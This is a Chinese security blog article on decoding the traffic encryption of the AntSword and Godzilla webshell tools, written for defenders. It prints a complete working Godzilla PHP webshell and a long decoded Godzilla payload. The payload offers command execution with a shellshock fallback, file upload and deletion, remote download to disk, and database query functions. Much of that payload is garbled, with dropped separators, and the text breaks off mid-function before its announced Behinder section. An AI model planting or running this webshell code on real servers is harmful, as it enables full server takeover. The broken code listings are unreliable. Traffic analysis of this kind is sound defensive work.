Webshell工具流量加密解析
2022-7-19 00:7:46 Author: mp.weixin.qq.com(查看原文) 阅读量:8 收藏

前言

webshell管理工具作为进一步信息收集、内网渗透、获取更高权限等操作的好帮手,常出现在攻防对抗和渗透测试场景下,其自带的流量加密用于绕过waf、ids等安全设备的检测,这里简单说下蚁剑、哥斯拉、冰蝎3.0这三款较为流行的工具在默认情况下的流量加密方式和解密方法,可以帮助守方在复盘时更好地还原攻击链和进行检测。

蚁剑

蚁剑的加密手段比较简单,配置界面中可选的编码器只有base64和rot13,这两者都是无需密钥、可直接解码的编码方式,这里以base64为例:

base64加密手段

提取参数后的编码直接进行base64解码:

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

解密内容:

// AntSword's default PHP probe payload, recovered by base64-decoding the POST
// parameter (this sample calls phpinfo(); other actions use the same frame).
// What a defender can key on:
//   * open_basedir prologue: when open_basedir is set, a temp dir (".9f1e7fc86"
//     here) is created and entered, open_basedir is relaxed to "..", chdir("..")
//     is repeated once per path component of the configured value, and finally
//     open_basedir is set to "/" and the temp dir removed. A burst of
//     ini_set("open_basedir", ...) calls in PHP audit/log data is a signal.
//   * asoutput(): the buffered output is base64-encoded and wrapped between two
//     short hex markers ("358dc"."5242b" and "79"."e55"), each built by string
//     concatenation. The values likely differ between requests (confirm on more
//     samples), so match the structure: hex prefix + base64 body + hex suffix.
//   * Errors come back as "ERROR://<message>" inside the same wrapper.
// NOTE(review): extraction dropped the comma in @ini_set("display_errors""0")
// and split `echo "kid"` across lines; the listing is not runnable as printed.
@ini_set("display_errors""0");@set_time_limit(0);$opdir=@ini_get("open_basedir");if($opdir) {$oparr=preg_split("/\\\\|\//",$opdir);$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);$tmdir=".9f1e7fc86";@mkdir($tmdir);@chdir($tmdir);@ini_set("open_basedir","..");for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}@ini_set("open_basedir","/");@rmdir($ocwd."/".$tmdir);};function asenc($out){return @base64_encode($out);};function asoutput(){$output=ob_get_contents();ob_end_clean();echo "358dc"."5242b";echo @asenc($output);echo "79"."e55";}ob_start();try{phpinfo();
echo "kid"

;}catch(Exception $e){echo "ERROR://".$e->getMessage();};asoutput();die();

哥斯拉

哥斯拉自带了几种加密方式,这里以php为例,分别介绍PHP_EVAL_XOR_BASE64、PHP_XOR_BASE64、PHP_XOR_RAW三种。

PHP_XOR_BASE64

这个用哥斯拉生成的shell:

<?php
// Godzilla "PHP_XOR_BASE64" shell stub as generated by the tool. Request and
// response share one 16-byte XOR key; the response is framed by two fixed
// md5 fragments, which is the most stable thing to match on.
@session_start();
@set_time_limit(0);
@error_reporting(0);   // errors are hidden, so a wrong key fails silently
// Byte-wise XOR with $K[($i+1)&15]; XOR is its own inverse, so this single
// function both decrypts requests and encrypts responses.
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$pass='pass';            // name of the POST parameter carrying the payload
$payloadName='payload';  // session slot that caches the XOR-ed payload
// Per the article: the first 16 hex chars of md5(<password used when the
// shell was generated>).
$key='3c6e0b8a9c15224a';
if (isset($_POST[$pass])){
    // Request: pass = base64( xor(plaintext, key) ).
    $data=encode(base64_decode($_POST[$pass]),$key);
    if (isset($_SESSION[$payloadName])){

        // Later requests: the large payload was cached in the session by the
        // first request, so only the small per-command $data travels now and
        // the session cookie ties the two together.
        $payload=encode($_SESSION[$payloadName],$key);
        if (strpos($payload,"getBasicsInfo")===false){
            // NOTE(review): this echo is absent from the otherwise identical
            // stub decoded further down the page; presumably the author's
            // debugging addition rather than part of the generated shell.
            echo($payload);

            $payload=encode($payload,$key);
        }
        eval($payload);   // the payload supplies run() and the rest of its API

        // Response framing: md5($pass.$key)[0:16] + base64(xor(result)) +
        // md5($pass.$key)[16:]. Both fragments are constant for a given
        // shell, so a fixed 16-hex-char prefix and suffix around a base64
        // body is the signature to look for.
        echo substr(md5($pass.$key),0,16);
        echo base64_encode(encode(@run($data),$key));
        echo substr(md5($pass.$key),16);
    }else{
        // First request: accepted only if it carries the payload (contains
        // "getBasicsInfo"); it is stored XOR-ed and nothing is echoed back.
        if (strpos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

根据shell文件可以看出加密过程:先将pass参数传递的内容base64解码,然后将内容与key进行异或操作,注意这里的key实际上是生成shell时所设置密钥的32位md5值的前16位。根据这些即可写一个一次性的解码脚本,以哥斯拉第一次流量交互的payload为例(这里生成shell时的密钥为key):

得到的payload值

将内容url解码后放入脚本中 脚本如下:

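<?php
// Offline decoder for captured Godzilla PHP_XOR_BASE64 traffic. It runs
// standalone, so keep diagnostics visible instead of copying the shell's
// silencing prologue: a mis-pasted value or a wrong key should fail loudly,
// not print an empty page. No session is needed here.
error_reporting(E_ALL);
ini_set('display_errors', '1');
@set_time_limit(0);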
function encode($D,$K){
    // Byte-wise XOR of $D with the key byte $K[($i + 1) & 15]; a 16-byte key
    // is assumed. XOR is its own inverse, so the same call decodes captured
    // traffic and re-encodes it. Works in place on the local copy of $D.
    $length = strlen($D);
    $pos = 0;
    while ($pos < $length) {
        $D[$pos] = $D[$pos] ^ $K[($pos + 1) & 15];
        $pos++;
    }
    return $D;
}
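// Key of the shell whose traffic is being decoded: the first 16 hex chars of
// md5(<password set when the shell was generated>), as written into the stub.
$key = '3c6e0b8a9c15224a';

// Paste the URL-decoded value of the captured `pass=` POST parameter here.
$post = '';

if ($post === '') {
    echo 'No captured payload: set $post to the url-decoded pass= value.';
    exit(1);
}

// Strict decoding: a character outside the base64 alphabet means the wrong
// parameter was captured or the value was not fully URL-decoded.
$raw = base64_decode($post, true);
if ($raw === false) {
    echo 'Input is not valid base64 (was it URL-decoded first?).';
    exit(1);
}

$data = encode($raw, $key);

echo "<br/>";
echo "<br/>";
// The decoded payload is attacker-supplied PHP source; escape it so the
// browser renders it as text instead of interpreting it as markup.
echo '<pre>' . htmlspecialchars($data, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8') . '</pre>';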

解密结果如下:

$parameters=array(); $_SES=array(); function run($pms){ global $ERRMSG; reDefSystemFunc(); $_SES=&getSession(); @session_start(); $sessioId=md5(session_id()); if (isset($_SESSION[$sessioId])){ $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId))); } @session_write_close(); if (canCallGzipDecode()==1&&@isGzipStream($pms)){ $pms=gzdecode($pms); } formatParameter($pms); if (isset($_SES["bypass_open_basedir"])&&$_SES["bypass_open_basedir"]==true){ @bypass_open_basedir(); } if (function_existsEx("set_error_handler")){ @set_error_handler("payloadErrorHandler"); } if (function_existsEx("set_exception_handler")){ @set_exception_handler("payloadExceptionHandler"); } $result=@evalFunc(); if ($result==null||$result===false){ $result=$ERRMSG; } if ($_SES!==null){ session_start(); $_SESSION[$sessioId]=base64_encode(S1MiwYYr(serialize($_SES),$sessioId)); @session_write_close(); } if (canCallGzipEncode()){ $result=gzencode($result,6); } return $result; } function payloadExceptionHandler($exception){ global $ERRMSG$ERRMSG.="ExceptionMsg:".$exception->getMessage()."\r\n"return true; } function payloadErrorHandler($errno$errstr$errfile=null, $errline=null,$errcontext=null){ global $ERRMSG$ERRMSG.="ErrLine: {$errline} ErrorMsg:{$errstr}\r\n"return true; } function S1MiwYYr($D,$K){ for($i=0;$istrlen($pms)-1){ break; } } } function evalFunc(){ @session_write_close(); $className=get("codeName"); $methodName=get("methodName"); $_SES=&getSession(); if ($methodName!=null){ if (strlen(trim($className))>0){ if ($methodName=="includeCode"){ return includeCode(); }elseif (isset($_SES[$className])){ return eval($_SES[$className]); }elsereturn "{$className} no load"; } } }elseif (function_exists($methodName)){ return $methodName(); }elsereturn "function {$methodName} not exist"; } } }elsereturn "methodName Is Null"; } } function deleteDir($p){ $m=@dir($p); while(@$f=$m->read()){ $pf=$p."/".$f; @chmod($pf,0777); if((is_dir($pf))&&($f!=".")&&($f!="..")){ 
deleteDir($pf); @rmdir($pf); }else if (is_file($pf)&&($f!=".")&&($f!="..")){ @unlink($pf); } } $m->close(); @chmod($p,0777); return @rmdir($p); } function deleteFile(){ $F=get("fileName"); if(is_dir($F)){ return deleteDir($F)?"ok":"fail"; }elsereturn (file_exists($F)?@unlink($F)?"ok":"fail":"fail"); } } function setFileAttr(){ $type = get("type"); $attr = get("attr"); $fileName = get("fileName"); $ret = "Null"if ($type!=null&&$attr!=null&&$fileName!=null) { if ($type=="fileBasicAttr"){ if (@chmod($fileName,convertFilePermissions($attr))){ return "ok"; }elsereturn "fail"; } }else if ($type=="fileTimeAttr"){ if (@touch($fileName,$attr)){ return "ok"; }elsereturn "fail"; } }elsereturn "no ExcuteType"; } }else$ret="type or attr or fileName is null"; } return $ret; } function fileRemoteDown(){ $url=get("url"); $saveFile=get("saveFile"); if ($url!=null&&$saveFile!=null) { $data=@file_get_contents($url); if ($data!==false){ if (@file_put_contents($saveFile,$data)!==false){ @chmod($saveFile,0777); return "ok"; }elsereturn "write fail"; } }elsereturn "read fail"; } }elsereturn "url or saveFile is null"; } } function copyFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (@is_file($srcFileName)){ if (copy($srcFileName,$destFileName)){ return "ok"; }elsereturn "fail"; } }elsereturn "The target does not exist or is not a file"; } } function moveFile(){ $srcFileName=get("srcFileName"); $destFileName=get("destFileName"); if (rename($srcFileName,$destFileName)){ return "ok"; }elsereturn "fail"; } } function getBasicsInfo() { $data = array(); $data['OsInfo'] = @php_uname(); $data['CurrentUser'] = @get_current_user(); $data['CurrentUser'] = strlen(trim($data['CurrentUser'])) > 0 ? 
$data['CurrentUser'] : 'NULL'$data['REMOTE_ADDR'] = @$_SERVER['REMOTE_ADDR']; $data['REMOTE_PORT'] = @$_SERVER['REMOTE_PORT']; $data['HTTP_X_FORWARDED_FOR'] = @$_SERVER['HTTP_X_FORWARDED_FOR']; $data['HTTP_CLIENT_IP'] = @$_SERVER['HTTP_CLIENT_IP']; $data['SERVER_ADDR'] = @$_SERVER['SERVER_ADDR']; $data['SERVER_NAME'] = @$_SERVER['SERVER_NAME']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['disable_functions'] = @ini_get('disable_functions'); $data['disable_functions'] = strlen(trim($data['disable_functions'])) > 0 ? $data['disable_functions'] : @get_cfg_var('disable_functions'); $data['Open_basedir'] = @ini_get('open_basedir'); $data['timezone'] = @ini_get('date.timezone'); $data['encode'] = @ini_get('exif.encode_unicode'); $data['extension_dir'] = @ini_get('extension_dir'); $tmpDir=sys_get_temp_dir(); $separator=substr($tmpDir,strlen($tmpDir)-1,1); if ($separator!='\\'&&$separator!='/'){ $tmpDir=$tmpDir.'/'; } $data['systempdir'] = $tmpDir$data['include_path'] = @ini_get('include_path'); $data['DOCUMENT_ROOT'] = $_SERVER['DOCUMENT_ROOT']; $data['PHP_SAPI'] = PHP_SAPI; $data['PHP_VERSION'] = PHP_VERSION; $data['PHP_INT_SIZE'] = PHP_INT_SIZE; $data['ProcessArch'] = PHP_INT_SIZE==8?"x64":"x86"$data['PHP_OS'] = PHP_OS; $data['canCallGzipDecode'] = canCallGzipDecode(); $data['canCallGzipEncode'] = canCallGzipEncode(); $data['session_name'] = @ini_get("session.name"); $data['session_save_path'] = @ini_get("session.save_path"); $data['session_save_handler'] = @ini_get("session.save_handler"); $data['session_serialize_handler'] = @ini_get("session.serialize_handler"); $data['user_ini_filename'] = @ini_get("user_ini.filename"); $data['memory_limit'] = @ini_get('memory_limit'); $data['upload_max_filesize'] = @ini_get('upload_max_filesize'); $data['post_max_size'] = @ini_get('post_max_size'); $data['max_execution_time'] = @ini_get('max_execution_time'); $data['max_input_time'] = @ini_get('max_input_time'); $data['default_socket_timeout'] = 
@ini_get('default_socket_timeout'); $data['mygid'] = @getmygid(); $data['mypid'] = @getmypid(); $data['SERVER_SOFTWAREypid'] = @$_SERVER['SERVER_SOFTWARE']; $data['SERVER_PORT'] = @$_SERVER['SERVER_PORT']; $data['loaded_extensions'] = @implode(',', @get_loaded_extensions()); $data['short_open_tag'] = @get_cfg_var('short_open_tag'); $data['short_open_tag'] = @(int)$data['short_open_tag'] == 1 ? 'true' : 'false'$data['asp_tags'] = @get_cfg_var('asp_tags'); $data['asp_tags'] = (int)$data['asp_tags'] == 1 ? 'true' : 'false'$data['safe_mode'] = @get_cfg_var('safe_mode'); $data['safe_mode'] = (int)$data['safe_mode'] == 1 ? 'true' : 'false'$data['CurrentDir'] = str_replace('\\''/', @dirname($_SERVER['SCRIPT_FILENAME'])); if (strlen(trim($data['CurrentDir']))==0){ $data['CurrentDir'] = str_replace('\\''/', @dirname(__FILE__)); } $SCRIPT_FILENAME=@dirname(__FILE__); $data['FileRoot'] = ''if (substr($SCRIPT_FILENAME01) != '/') { $drivers=array('C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'); foreach ($drivers as $L){ if (@is_dir("{$L}:/")){ $data['FileRoot'] .= "{$L}:/;";} } if (empty($data['FileRoot'])){ $data['FileRoot']=substr($SCRIPT_FILENAME,0,3); } }else$data['FileRoot'] .= "/"; } $result=""foreach($data as $key=>$value){ $result.=$key." 
: ".$value."\n"; } return $result; } function getFile(){ $dir=get('dirName'); $dir=(strlen(@trim($dir))>0)?trim($dir):str_replace('\\','/',dirname(__FILE__)); $dir.="/"$path=$dir$allFiles = @scandir($path); $data=""if ($allFiles!=null){ $data.="ok"$data.="\n"$data.=$path$data.="\n"foreach ($allFiles as $fileName) { if ($fileName!="."&&$fileName!=".."){ $fullPath = $path.$fileName$lineData=array(); array_push($lineData,$fileName); array_push($lineData,@is_file($fullPath)?"1":"0"); array_push($lineData,date("Y-m-d H:i:s", @filemtime($fullPath))); array_push($lineData,@filesize($fullPath)); $fr=(@is_readable($fullPath)?"R":"").(@is_writable($fullPath)?"W":"").(@is_executable($fullPath)?"X":""); array_push($lineData,(strlen($fr)>0?$fr:"F")); $data.=(implode("\t",$lineData)."\n"); } } }elsereturn "Path Not Found Or No Permission!"; } return $data; } function readFileContent(){ $fileName=get("fileName"); if (@is_file($fileName)){ if (function_existsEx("is_readable")){ return file_get_contents($fileName); }elsereturn "No Permission!"; } }elsereturn "File Not Found"; } } function uploadFile(){ $fileName=get("fileName"); $fileValue=get("fileValue"); if (@file_put_contents($fileName,$fileValue)!==false){ @chmod($fileName,0777); return "ok"; }elsereturn "fail"; } } function newDir(){ $dir=get("dirName"); if (@mkdir($dir,0777,true)!==false){ return "ok"; }elsereturn "fail"; } } function newFile(){ $fileName=get("fileName"); if (@file_put_contents($fileName,"")!==false){ return "ok"; }elsereturn "fail"; } } function function_existsEx($functionName){ $d=explode(",",@ini_get("disable_functions")); if(empty($d)){ $d=array(); }else$d=array_map('trim',array_map('strtolower',$d)); } return(function_exists($functionName)&&is_callable($functionName)&&!in_array($functionName,$d)); } function execCommand(){ @ob_start(); $cmdLine=get("cmdLine"); if(substr(__FILE__,0,1)=="/"){ @putenv("PATH=".getenv("PATH").":/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"); }else{ 
@putenv("PATH=".getenv("PATH").";C:/Windows/system32;C:/Windows/SysWOW64;C:/Windows;C:/Windows/System32/WindowsPowerShell/v1.0/;"); } $result=""if (!function_existsEx("runshellshock")){ function runshellshock($d$c) { if (substr($d01) == "/" && function_existsEx('putenv') && (function_existsEx('error_log') || function_existsEx('mail'))) { if (strstr(readlink("/bin/sh"), "bash") != FALSE) { $tmp = tempnam(sys_get_temp_dir(), 'as'); putenv("PHP_LOL=() { x; }; $c >$tmp 2>&1"); if (function_existsEx('error_log')) { error_log("a"1); } else { mail("[email protected]""""""-bv"); } } else { return False; } $output = @file_get_contents($tmp); @unlink($tmp); if ($output != "") { return $output; } } return False; }; } if(function_existsEx('system')){ @system($cmdLine,$ret); }elseif(function_existsEx('passthru')){ $result=@passthru($cmdLine,$ret); }elseif(function_existsEx('shell_exec')){ $result=@shell_exec($cmdLine); }elseif(function_existsEx('exec')){ @exec($cmdLine,$o,$ret); $result=join("\n",$o); }elseif(function_existsEx('popen')){ $fp=@popen($cmdLine,'r'); while(!@feof($fp)){ $result.=@fgets($fp,1024*1024); } @pclose($fp); }elseif(function_existsEx('proc_open')){ $p = @proc_open($cmdLine, array(1 => array('pipe''w'), 2 => array('pipe''w')), $io); while(!@feof($io[1])){ $result.=@fgets($io[1],1024*1024); } while(!@feof($io[2])){ $result.=@fgets($io[2],1024*1024); } @fclose($io[1]); @fclose($io[2]); @proc_close($p); }elseif(substr(__FILE__,0,1)!="/" && @class_exists("COM")){ $w=new COM('WScript.shell'); $e=$w->exec($cmdLine); $so=$e->StdOut(); $result.=$so->ReadAll(); $se=$e->StdErr(); $result.=$se->ReadAll(); }elseif (function_existsEx("pcntl_fork")&&function_existsEx("pcntl_exec")){ $cmd="/bin/bash"if (!file_exists($cmd)){ $cmd="/bin/sh"; } $commandFile=sys_get_temp_dir()."/".time().".log"$resultFile=sys_get_temp_dir()."/".(time()+1).".log"; @file_put_contents($commandFile,$cmdLine); switch (pcntl_fork()) { case 0$args = array("-c""$cmdLine > $resultFile"); 
pcntl_exec($cmd$args); // the child will only reach this point on exec failure, // because execution shifts to the pcntl_exec()ed command exit(0); default: break; } if (!file_exists($resultFile)){ sleep(2); } $result=file_get_contents($resultFile); @unlink($commandFile); @unlink($resultFile); }elseif(($result=runshellshock(__FILE__, $cmdLine)!==false)) { }elsereturn "none of proc_open/passthru/shell_exec/exec/exec/popen/COM/runshellshock/pcntl_exec is available"; } $result .= @ob_get_contents(); @ob_end_clean(); return $result; } function execSql(){ $dbType=get("dbType"); $dbHost=get("dbHost"); $dbPort=get("dbPort"); $username=get("dbUsername"); $password=get("dbPassword"); $execType=get("execType"); $execSql=get("execSql"); $charset=get("dbCharset"); $currentDb=get("currentDb"); function mysqli_exec($host,$port,$username,$password,$execType,$currentDb,$sql,$charset){ // 创建连接 $conn = new mysqli($host,$username,$password,"",$port); // Check connection if ($conn->connect_error) { return $conn->connect_error; } if (!empty($charset)){ $conn->set_charset($charset); } if (!empty($currentDb)){ $conn->select_db($currentDb); } $result = $conn->query($sql); if ($conn->error){ return $conn->error; } if ($execType=="update"){ return "Query OK, ".$conn->affected_rows." 
rows affected"; }else$data="ok\n"while ($column = $result->fetch_field()){ $data.=base64_encode($column->name)."\t"; } $data.="\n"if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { foreach ($row as $value){ $data.=base64_encode($value)."\t"; } $data.="\n"; } } return $data; } } function mysql_exec($host$port$username$password$execType$currentDb,$sql,$charset) { $con = @mysql_connect($host.":".$port$username$password); if (!$con) { return mysql_error(); } else { if (!empty($charset)){ mysql_set_charset($charset,$con); } if (!empty($currentDb)){ if (function_existsEx("mysql_selectdb")){ mysql_selectdb($currentDb,$con); }elseif (function_existsEx("mysql_select_db")){ mysql_select_db($currentDb,$con); } } $result = @mysql_query($sql); if (!$result) { return mysql_error(); } if ($execType == "update") { return "Query OK, ".mysql_affected_rows($con)." rows affected"; } else { $data = "ok\n"for ($i = 0$i < mysql_num_fields($result); $i++) { $data.= base64_encode(mysql_field_name($result$i))."\t"; } $data.= "\n"$rowNum = mysql_num_rows($result); if ($rowNum > 0) { while ($row = mysql_fetch_row($result)) { foreach($row as $value) { $data.= base64_encode($value)."\t"; } $data.= "\n"; } } } @mysql_close($con); return $data; } } function mysqliEx_exec($host$port$username$password$execType$currentDb,$sql,$charset){ $port == "" ? $port = "3306" : $port$T=@mysqli_connect($host,$username,$password,"",$port); if (!empty($charset)){ @mysqli_set_charset($charset); } if (!empty($currentDb)){ @mysqli_select_db($T,$currentDb); } $q=@mysqli_query($T,$sql); if(is_bool($q)){ return mysqli_error($T); }elseif (mysqli_num_fields($q)>0){ $i=0$data = "ok\n"while($col=@mysqli_fetch_field($q)){ $data.=base64_encode($col->name)."\t"$i++; } $data.="\n"while($rs=@mysqli_fetch_row($q)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.="\n"; } return $data; }elsereturn "Query OK, ".@mysqli_affected_rows($T)." 
rows affected"; } } } function pg_execEx($host$port$username$password$execType,$currentDb$sql,$charset){ $port == "" ? $port = "5432" : $port$arr=array( 'host'=>$host'port'=>$port'user'=>$username'password'=>$password ); if (!empty($currentDb)){ $arr["dbname"]=$currentDb; } $cs=''foreach($arr as $k=>$v) { if(empty($v)){ continue; } $cs .= "$k=$v "; } $T=@pg_connect($cs); if(!$T){ return @pg_last_error(); }elseif (!empty($charset)){ @pg_set_client_encoding($T,$charset); } $q=@pg_query($T$sql); if(!$q){ return @pg_last_error(); }else$n=@pg_num_fields($q); if($n===NULL){ return @pg_last_error(); }elseif($n===0){ return "Query OK, ".@pg_affected_rows($q)." rows affected"; }else$data = "ok\n"for($i=0;$i<$n;$i++){ $data.=base64_encode(@pg_field_name($q,$i))."\t"; } $data.= "\n"while($row=@pg_fetch_row($q)){ for($i=0;$i<$n;$i++){ $data.=base64_encode($row[$i]!==NULL?$row[$i]:"NULL")."\t"; } $data.= "\n"; } return $data; } } } } function sqlsrv_exec($host$port$username$password$execType$currentDb,$sql){ $dbConfig=array("UID"=> $username,"PWD"=>$password); if (!empty($currentDb)){ $dbConfig["Database"]=$currentDb; } $T=@sqlsrv_connect($host,$dbConfig); $q=@sqlsrv_query($T,$sql,null); if($q!==false){ $i=0$fm=@sqlsrv_field_metadata($q); if(empty($fm)){ $ar=@sqlsrv_rows_affected($q); return "Query OK, ".$ar." rows affected"; }else$data = "ok\n"foreach($fm as $rs){ $data.=base64_encode($rs['Name'])."\t"$i++; } $data.= "\n"while($rs=@sqlsrv_fetch_array($q,SQLSRV_FETCH_NUMERIC)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.= "\n"; } return $data; } }else$err=""if(($e = sqlsrv_errors()) != null){ foreach($e as $v){ $err.=($e['message'])."\n"; } } return $err; } } function mssql_exec($host$port$username$password$execType,$currentDb$sql){ $T=@mssql_connect($host,$username,$password); if (!empty($currentDb)){ @mssql_select_db($currentDb); } $q=@mssql_query($sql,$T); if(is_bool($q)){ return "Query OK, ".@mssql_rows_affected($T)." 
rows affected"; }else$data = "ok\n"$i=0while($rs=@mssql_fetch_field($q)){ $data.=base64_encode($rs->name)."\t"$i++; } $data.="\n"while($rs=@mssql_fetch_row($q)){ for($c=0;$c<$i;$c++){ $data.=base64_encode(trim($rs[$c]))."\t"; } $data.="\n"; } @mssql_free_result($q); @mssql_close($T); return $data; } } function oci_exec($host$port$username$password$execType$currentDb$sql$charset) { $chs = $charset ? $charset : "utf8"$mod = 0$H = @oci_connect($username$password$host$chs$mod); if (!$H) { $errObj=@oci_error(); return $errObj["message"]; } else { $q = @oci_parse($H$sql); if (@oci_execute($q)) { $n = oci_num_fields($q); if ($n == 0) { return "Query OK, ".@oci_num_rows($q)." rows affected"; } else { $data = "ok\n"for ($i = 1$i <= $n$i++) { $data.= base64_encode(oci_field_name($q$i))."\t"; } $data.= "\n"while ($row = @oci_fetch_array($q, OCI_ASSOC + OCI_RETURN_NULLS)) { foreach($row as $item) { $data.= base64_encode($item !== null ? base64_encode($item) : ""). "\t"; } $data.= "\n"; } return $data; } } else { $e = @oci_error($q); if ($e) { return "ERROR://{$e['message']} in [{$e['sqltext']}] col:{$e['offset']}"; } else { return "false"; } } } } function ora_exec($host$port$username$password$execType$currentDb$sql$charset) { $H = @ora_plogon("{$username}@{$host}""{$password}"); if (!$H) { return "Login Failed!"; } else { $T = @ora_open($H); @ora_commitoff($H); $q = @ora_parse($T"{$sql}"); $R = ora_exec($T); if ($R) { $n = ora_numcols($T); $data="ok\n"for ($i = 0$i < $n$i++) { $data.=base64_encode(Ora_ColumnName($T$i))."\t"; } $data.="\n"while (ora_fetch($T)) { for ($i = 0$i < $n$i++) { $data.=base64_encode(trim(ora_getcolumn($T$i)))."\t"; } $data.="\n"; } return $data; } else { return "false"; } } } function sqlite_exec($host$port$username$password$execType$currentDb$sql$charset) { $dbh=new SQLite3($host); if(!$dbh){ return "ERROR://CONNECT ERROR".SQLite3::lastErrorMsg(); }else$stmt=$dbh->prepare($sql); if(!$stmt){ return "ERROR://".$dbh->lastErrorMsg(); } else { 
$result=$stmt->execute(); if(!$result){ return $dbh->lastErrorMsg(); }else$bool=True; $data="ok\n"while($res=$result->fetchArray(SQLITE3_ASSOC)){ if($bool){ foreach($res as $key=>$value){ $data.=base64_encode($key)."\t"; } $bool=False; $data.="\n"; } foreach($res as $key=>$value){ $data.=base64_encode($value!==NULL?$value:"NULL")."\t"; } $data.="\n"; } if($bool){ if(!$result->numColumns()){ return "Query OK, ".$dbh->changes()." rows affected"; }elsereturn "ERROR://Table is empty."; } }elsereturn $data; } } } $dbh->close(); } } function pdoExec($databaseType,$host,$port,$username,$password,$execType,$currentDb,$sql){ $conn=null; if ($databaseType==="oracle"){ $databaseType="orcl"; } if (strpos($host,"=")!==false){ $conn = new PDO($host$username$password); }else if (!empty($currentDb)){ $conn = new PDO("{$databaseType}:host=$host;port={$port};dbname={$currentDb}"$username$password); }else$conn = new PDO("{$databaseType}:host=$host;port={$port};"$username$password); } $conn->setAttribute(30); if ($execType=="update"){ $affectRows=$conn->exec($sql); if ($affectRows!==false){ return "Query OK, ".$conn->exec($sql)." 
rows affected"; }elsereturn "Err->\n".implode(',',$conn->errorInfo()); } }else$data="ok\n"$stm=$conn->prepare($sql); if ($stm->execute()){ $row=$stm->fetch(2); $_row="\n"foreach (array_keys($row) as $key){ $data.=base64_encode($key)."\t"$_row.=base64_encode($row[$key])."\t"; } $data.=$_row."\n"while ($row=$stm->fetch(2)){ foreach (array_keys($row) as $key){ $data.=base64_encode($row[$key])."\t"; } $data.="\n"; } return $data; }elsereturn "Err->\n".implode(',',$stm->errorInfo()); } } } if ($dbType=="mysql"&&(class_exists("mysqli")||function_existsEx("mysql_connect")||function_existsEx("mysqli_connect"))){ if (class_exists("mysqli")){ return mysqli_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }elseif (function_existsEx("mysql_connect")){ return mysql_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }else if (function_existsEx("mysqli_connect")){ return mysqliEx_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif ($dbType=="postgresql"&&function_existsEx("pg_connect")){ if (function_existsEx("pg_connect")){ return pg_execEx($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif ($dbType=="sqlserver"&&(function_existsEx("sqlsrv_connect")||function_existsEx("mssql_connect"))){ if (function_existsEx("sqlsrv_connect")){ return sqlsrv_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); }elseif (function_existsEx("mssql_connect")){ return mssql_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); } }elseif ($dbType=="oracle"&&(function_existsEx("oci_connect")||function_existsEx("ora_plogon"))){ if (function_existsEx("oci_connect")){ return oci_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); }else if (function_existsEx("ora_plogon")){ return oci_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } }elseif 
($dbType=="sqlite"&&class_exists("SQLite3")){ return sqlite_exec($dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql,$charset); } if (extension_loaded("pdo")){ return pdoExec($dbType,$dbHost,$dbPort,$username,$password,$execType,$currentDb,$execSql); }elsereturn "no extension"; } } function base64Encode($data){ return base64_encode($data); } function test(){ return "ok"; } function get($key){ global $parametersif (isset($parameters[$key])){ return $parameters[$key]; }elsereturn null; } } function getAllParameters(){ global $parametersreturn $parameters; } function includeCode(){ $classCode=get("binCode"); $codeName=get("codeName"); $_SES=&getSession(); $_SES[$codeName]=$classCodereturn "ok"; } function base64Decode($string){ return base64_decode($string); } function convertFilePermissions($fileAttr){ $mod=0if (strpos($fileAttr,'R')!==false){ $mod=$mod+0444; } if (strpos($fileAttr,'W')!==false){ $mod=$mod+0222; } if (strpos($fileAttr,'X')!==false){ $mod=$mod+0111; } return $mod; } function g_close(){ @session_start(); $_SES=&getSession(); $_SES=null; if (@session_destroy()){ return "ok"; }elsereturn "fail!"; } } function bigFileDownload(){ $mode=get("mode"); $fileName=get("fileName"); $readByteNum=get("readByteNum"); $position=get("position"); if ($mode=="fileSize"){ return @filesize($fileName).""; }elseif ($mode=="read"){ if (function_existsEx("fopen")&&function_existsEx("fread")&&function_existsEx("fseek")){ $handle=fopen($fileName,"rb"); if ($handle!==false){ @fseek($handle,$position); $data=fread($handle,$readByteNum); @fclose($handle); if ($data!==false){ return $data; }elsereturn "cannot read file"; } }elsereturn "cannot open file"; } }else if (function_existsEx("file_get_contents")){ return file_get_contents($fileName,false,null,$position,$readByteNum); }elsereturn "no function"; } }elsereturn "no mode"; } } function bigFileUpload(){ $fileName=get("fileName"); $fileContents=get("fileContents"); $position=get("position"); 
